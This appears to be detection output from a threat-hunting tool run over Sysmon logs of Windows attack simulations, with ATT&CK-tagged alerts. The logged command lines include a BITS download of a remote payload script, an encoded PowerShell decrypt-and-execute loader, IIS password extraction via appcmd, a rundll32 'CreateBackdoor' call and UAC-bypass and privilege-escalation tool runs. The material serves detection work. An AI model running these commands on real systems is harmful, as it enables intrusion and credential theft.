+ 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564913810.45591,2019-08-04T14:16:50.455910+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5950 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 10:16:49.960 + 747F3D96-B091-5D46-0000-001081F71104 + 820 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-B080-5D46-0000-0010D4EA0F04 + 2112 + C:\Windows\System32\WSReset.exe + "C:\Windows\system32\WSReset.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1595802375.141764,2020-07-27T02:26:15.141764+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 339222 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-26 22:26:14.521 + 747F3D96-0306-5F1E-0000-0010E15F3100 + 3660 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-F938-5F1D-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-F938-5F1D-0000-00104B500000 + 584 + C:\Windows\System32\winlogon.exe + winlogon.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.555423,2019-05-27T05:29:20.555423+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5991 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.475 + 365ABB72-3D70-5CEB-0000-0010F2EDFF00 + 4012 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564834103.555174,2019-08-03T16:08:23.555174+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5452 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 12:08:23.391 + 747F3D96-7937-5D45-0000-00100D290801 + 4192 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-D4E9-5D45-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-7934-5D45-0000-0010CAB90701 + 7564 + C:\Windows\System32\consent.exe + consent.exe 896 272 00000280644BC500 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1589069378.023663,2020-05-10T04:09:38.023663+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 112969 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-10 00:09:36.703 + 747F3D96-4640-5EB7-0000-0010EF364B01 + 372 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\Windows\System32\cmd.exe + c:\Users\IEUser\Tools\PrivEsc\ + NT AUTHORITY\SYSTEM + 747F3D96-3B92-5EB5-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-4640-5EB7-0000-0010292D4B01 + 8028 + C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe + NetworkServiceExploit.exe -i -c "c:\Windows\System32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243516 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.518 + 747F3D96-9F61-5E75-0000-00109B6C1E00 + 6620 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243516 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.518 + 747F3D96-9F61-5E75-0000-00109B6C1E00 + 6620 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16443 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:58:54.772 + 365ABB72-269E-5CD8-0000-001084F81A00 + 2728 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-268F-5CD8-0000-0010F4A51700 + 1256 + C:\Python27\python.exe + python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243516 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.518 + 747F3D96-9F61-5E75-0000-00109B6C1E00 + 6620 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16443 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:58:54.772 + 365ABB72-269E-5CD8-0000-001084F81A00 + 2728 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-268F-5CD8-0000-0010F4A51700 + 1256 + C:\Python27\python.exe + python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16443 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:58:54.772 + 365ABB72-269E-5CD8-0000-001084F81A00 + 2728 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-268F-5CD8-0000-0010F4A51700 + 1256 + C:\Python27\python.exe + python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16040 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 17:28:22.488 + 365ABB72-0636-5CD7-0000-0010A6C72100 + 544 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\windows\System32\cmd.exe + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-F9CD-5CD6-0000-00201B370100 + 0x1371b + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-0545-5CD7-0000-001078371F00 + 3044 + C:\Windows\System32\dllhost.exe + C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.43525,2019-05-27T05:29:20.435250+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5988 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.375 + 365ABB72-3D70-5CEB-0000-001032EAFF00 + 1004 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1197] BITS Jobs - Process,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4893 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.238 + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + 